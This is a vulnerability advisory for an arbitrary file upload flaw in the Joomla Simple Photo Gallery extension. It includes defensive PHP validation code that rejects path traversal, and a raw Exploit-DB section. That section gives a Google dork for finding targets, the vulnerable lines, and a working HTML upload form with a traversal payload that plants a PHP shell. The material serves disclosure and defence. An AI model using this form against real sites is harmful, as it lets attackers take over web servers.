Vendor: Joomla Simple Photo Gallery
By: CrashBandicot @DosPerl
CVSS: 8.8 (HIGH)
Type: Arbitrary File Upload
CWE: 434
Product Name: Joomla Simple Photo Gallery
Affected Version From: 1
Affected Version To: 1
Patch Exists: NO
Related CWE: N/A
CPE: a:apptha:joomla_simple_photo_gallery
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: Windows
Year: 2015

Joomla Simple Photo Gallery – Arbitrary File Upload

A vulnerability in Joomla Simple Photo Gallery allows an attacker to upload arbitrary files to the server. The cause is a lack of input validation in uploadFile.php: the script URL-decodes the jpath request parameter, appends $fileName to it and passes the result to move_uploaded_file() as the destination. By setting jpath to ../../../../ and submitting a file in the uploadfile parameter, an attacker can place a malicious file outside the intended directory. This can be exploited to execute arbitrary PHP code on the server.

Mitigation:

Input validation should be implemented to prevent malicious files from being uploaded to the server.
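
One way to implement that validation for the upload logic in uploadFile.php, as an added example that is not the extension's or the advisory author's code. GALLERY_DIR, ALLOWED_EXT and both function names are assumptions chosen for illustration.

```php
<?php
// Added example, not the extension's code. GALLERY_DIR, ALLOWED_EXT and the
// function names are assumptions made for illustration.
// In a Joomla component the file would also begin with
//   defined('_JEXEC') or die;
// so that it cannot be requested directly, outside the authenticated framework.
const GALLERY_DIR = '/var/www/joomla/images/photogallery'; // hypothetical path
const ALLOWED_EXT = ['jpg', 'jpeg', 'png', 'gif'];

/** Map a client-supplied sub-directory and file name to a path inside $baseDir,
 *  or return null when the request must be rejected. */
function resolveUploadTarget(string $baseDir, string $subDir, string $clientName): ?string
{
    $base = realpath($baseDir);
    if ($base === false || strpos($subDir, "\0") !== false) {
        return null;
    }
    // No urldecode(): the value is used as received. realpath() collapses "../"
    // and follows symlinks, so the prefix check sees the real destination.
    $dir = realpath($base . DIRECTORY_SEPARATOR . $subDir);
    if ($dir === false || !is_dir($dir)) {
        return null;
    }
    $prefix = $base . DIRECTORY_SEPARATOR;
    if ($dir !== $base && strncmp($dir, $prefix, strlen($prefix)) !== 0) {
        return null; // jpath resolved outside the gallery directory
    }
    $ext = strtolower(pathinfo($clientName, PATHINFO_EXTENSION));
    if (!in_array($ext, ALLOWED_EXT, true)) {
        return null; // .php, .phtml, no extension, ...
    }
    // Server-chosen name: nothing from the client name reaches the filesystem.
    return $dir . DIRECTORY_SEPARATOR . bin2hex(random_bytes(16)) . '.' . $ext;
}

function handleUpload(array $files, array $request): bool
{
    $f = $files['uploadfile'] ?? null;
    if (!is_array($f) || $f['error'] !== UPLOAD_ERR_OK || !is_uploaded_file($f['tmp_name'])) {
        return false;
    }
    if (@getimagesize($f['tmp_name']) === false) {
        return false; // content is not a recognisable image
    }
    $jpath = is_string($request['jpath'] ?? null) ? $request['jpath'] : '';
    $target = resolveUploadTarget(GALLERY_DIR, $jpath, (string) $f['name']);
    return $target !== null && move_uploaded_file($f['tmp_name'], $target);
}
```

With this check a jpath of ../../../../ resolves outside GALLERY_DIR and is rejected, and an encoded ..%2F is treated as a literal directory name that does not exist.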

Exploit-DB raw data:

######################################################################
# Exploit Title: Joomla Simple Photo Gallery - Arbitrary File Upload
# Google Dork: inurl:com_simplephotogallery
# Date: 10.03.2015
# Exploit Author: CrashBandicot @DosPerl
# My Github: github.com/CCrashBandicot
# Vendor Homepage: https://www.apptha.com/
# Software Link: https://www.apptha.com/category/extension/joomla/simple-photo-gallery
# Version: 1
# Tested on: Windows
######################################################################
 
# Vulnerable File : uploadFile.php
# Path : /administrator/components/com_simplephotogallery/lib/uploadFile.php
 
20.   $fieldName = 'uploadfile';
87.      $fileTemp = $_FILES[$fieldName]['tmp_name'];
94.         $uploadPath = urldecode($_REQUEST["jpath"]).$fileName;
96.      if(! move_uploaded_file($fileTemp, $uploadPath))
 
 
# Exploit :
 
<form method="POST" action="http://localhost/administrator/components/com_simplephotogallery/lib/uploadFile.php" enctype="multipart/form-data" >
    <input type="file" name="uploadfile"><br>
    <input type="text" name="jpath" value="..%2F..%2F..%2F..%2F" ><br>
    <input type="submit" name="Submit" value="Pwn!">
</form>
 
# The name of the shell is shown after clicking Pwn!; the name is random (e.g. backdoor__FDSfezfs.php)
 
# Shell Path : http://localhost/backdoor__[RandomString].php